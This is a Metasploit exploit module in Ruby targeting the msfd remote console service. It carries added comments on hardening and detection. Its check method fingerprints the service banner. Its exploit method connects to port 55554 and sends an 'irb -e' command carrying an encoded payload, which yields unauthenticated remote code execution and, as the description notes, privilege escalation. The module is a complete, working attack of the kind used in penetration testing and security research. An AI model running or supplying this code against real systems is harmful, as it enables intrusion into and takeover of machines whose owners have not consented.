Path: blob/master/modules/exploits/multi/misc/msfd_rce_remote.rb
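##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Metasploit module targeting the msfd remote console service.
#
# Security context: per the module description, msfd offers a
# msfconsole-like interface over a TCP socket. The exchange in #exploit
# shows no authentication step between connecting and submitting a console
# command, so reachability of the port is the only barrier visible here.
#
# Defensive takeaways:
# * Bind msfd to a loopback address only and filter its port at the host
#   firewall (55554 is the default RPORT registered below).
# * Do not run msfd with more privileges than the operator needs; the
#   description notes that a higher-privileged msfd is a local
#   privilege-escalation path as well.
# * For detection, alert on msfd listeners on non-loopback interfaces and on
#   unexpected inbound connections to the msfd port.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Tcp

  # Registers module metadata and the default target port.
  #
  # @param info [Hash] metadata supplied by the framework, merged with the
  #   values declared here via update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Metasploit msfd Remote Code Execution',
        'Description' => %q{
          Metasploit's msfd-service makes it possible to get a msfconsole-like
          interface over a TCP socket. If this socket is accessible on a remote
          interface, an attacker can execute commands on the victim's machine.

          If msfd is running with higher privileges than the current local user,
          this module can also be used for privilege escalation. In that case,
          port forwarding on the compromised host can be used.

          Code execution is achieved with the msfconsole command: irb -e 'CODE'.
        },
        'Author' => 'Robin Stenvi <robin.stenvi[at]gmail.com>',
        'License' => BSD_LICENSE,
        'Platform' => "ruby",
        'Arch' => ARCH_RUBY,
        'Payload' => {
          'Space' => 8192, # Arbitrary limit
          # Single quote and newline: the command sent in #exploit is wrapped
          # in single quotes and terminated by a newline.
          'BadChars' => "\x27\x0a",
          'DisableNops' => true
        },
        'Targets' => [
          [ 'Automatic', {} ]
        ],
        'Privileged' => false,
        'DisclosureDate' => '2018-04-11', # Vendor notification
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        Opt::RPORT(55554)
      ]
    )
  end

  # Fingerprints the remote service from the first data it sends.
  #
  # The match is a plain substring test for "msf", so it is only a heuristic:
  # any service whose greeting contains that text is reported the same way,
  # which is why the strongest result returned is Appears.
  #
  # @return [Exploit::CheckCode] Appears when the greeting contains "msf",
  #   Unknown otherwise (including when no greeting is received)
  def check
    connect
    banner = sock.get_once

    # get_once may return nil when no data is read; the original called
    # include? on that value and raised NoMethodError instead of reporting.
    return Exploit::CheckCode::Appears if banner&.include?("msf")

    Exploit::CheckCode::Unknown
  ensure
    # Close the socket on every path, including when reading raises.
    disconnect
  end

  # Connects, discards the greeting, and submits one console command line
  # carrying the encoded payload, then closes the connection.
  #
  # @return [void]
  def exploit
    connect
    sock.get_once
    sock.put "irb -e '" + payload.encoded + "'\n"
    disconnect
  end
end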